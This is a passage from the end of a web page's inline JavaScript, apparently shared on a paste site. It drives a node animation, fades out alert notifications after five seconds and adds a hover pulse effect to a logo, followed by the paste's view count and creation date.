nodes.forEach(node => {
node.update();
node.draw();
});
requestAnimationFrame(animate);
}
setTimeout(animate, 1000);
// Auto-hide notifications after 5 seconds
document.addEventListener('DOMContentLoaded', function() {
const alerts = document.querySelectorAll('.alert');
alerts.forEach(alert => {
setTimeout(() => {
if (alert.parentNode) {
alert.style.transition = 'all 0.5s ease';
alert.style.opacity = '0';
alert.style.transform = 'translateY(-20px)';
setTimeout(() => {
if (alert.parentNode) {
alert.remove();
}
}, 500);
}
}, 5000);
});
});
// Logo interaction enhancement
document.addEventListener('DOMContentLoaded', function() {
const logo = document.querySelector('.round-logo');
if (logo) {
logo.addEventListener('mouseenter', function() {
this.style.animation = 'none';
setTimeout(() => {
this.style.animation = 'logoPulse 1s ease-in-out infinite';
}, 10);
});
logo.addEventListener('mouseleave', function() {
this.style.animation = 'logoPulse 3s ease-in-out infinite';
});
}
});
</script>
</body>
</html>
Views: 8
Created At: 2026-06-08 18:52:20
Copy the code below to embed this paste: